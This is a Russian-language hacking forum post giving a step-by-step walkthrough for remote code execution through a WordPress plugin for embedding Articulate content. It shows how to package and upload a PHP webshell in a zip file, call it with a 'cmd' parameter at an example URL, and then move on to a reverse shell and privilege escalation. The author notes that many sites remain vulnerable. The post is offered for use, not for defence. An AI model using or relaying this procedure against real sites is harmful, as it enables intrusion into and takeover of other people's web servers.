![]() |
Доброго времени суток форумчане. Сегодня я расскажу вам про удалённое выполнение кода через плагин WordPress Insert or Embed Articulate Content into WordPress.
В этом плагине отсутствует фильтр который бы проверял на 'вредность' php файл. Wordpress - Система управления содержимым сайта с открытым исходным кодом; написана на PHP; сервер базы данных - MySQL; выпущена под лицензией GNU GPL версии 2. Сфера применения - от блогов до достаточно сложных новостных ресурсов и интернет-магазинов. Встроенная система «тем» и «плагинов» вместе с удачной архитектурой позволяет конструировать проекты широкой функциональной сложности. https://forum.antichat.xyz/attachmen...949b62b54e.png Поехали! Эта уязвимость была найдена 2019-06-11 и всё ещё миллион сайтов уязвимы перед ней. Чтобы выполнить код нужно быть авторизированным пользователем в системе и иметь доступ к плагину. ## 1. Для начала нужно создать .zip файл с двумя файлами: index.html, index.php Код:
echo "hello" > index.htmlКод:
echo "" > index.phpКод:
zip poc.zip index.html index.php## 3. Далее зеагрузитье ваш payload в плагин: Создать новый пост - > выберите "Добавить блок" - > E-Learning - > загрузить poc.zip - > вставить как: Iframe - > вставить ## 4. Доступ к webshell с URL-адреса, отображаемого после загрузки аналогично. Пример: http://vulnweb.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=id Далее можно уже сделать reverse shell и получить шелл сайта и уже делать пост-эксплуатацию и повышению привилегий. Спасибо за прочтение моей статьи! В скором времени напишу про удалённое выполнение кода на playstation4! |
| Время: 08:52 |